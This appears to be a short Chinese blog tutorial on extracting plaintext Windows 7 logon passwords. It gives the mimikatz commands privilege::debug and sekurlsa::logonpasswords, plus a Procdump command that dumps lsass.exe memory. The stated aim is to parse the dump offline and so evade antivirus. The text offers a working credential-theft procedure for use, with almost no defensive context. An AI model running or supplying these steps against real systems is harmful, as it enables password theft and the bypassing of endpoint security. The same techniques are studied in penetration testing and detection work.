当前位置:   article > 正文

使用Procdump+mimikatz抓取windows7明文密码_procdump win7

procdump win7

首先打开mimikatz_trunk2.0

在DOS运行界面中输入privilege::debug提权命令1

我们提权成功后,我们再来输入sekurlsa::logonpasswords抓取密码命令

但是出现错误,如下图
在这里插入图片描述
网上搜索了一下,我决定使用procdump结合mimikatz实现免杀效果,procdump是微软的官方工具,不会被杀.

首先在任务管理器找到lsass.exe,右键创建转储文件

在这里插入图片描述

用procdump导出lsass.dmp后拖回本地抓取密码来规避杀软。
命令:

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp
  • 1

在这里插入图片描述

注意点:

  • 使用管理员权限打开DOS窗口
    *需将lsass.dmp移到procdump64.exe同目录
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/不正经/article/detail/690293
推荐阅读
  

闽ICP备14008679号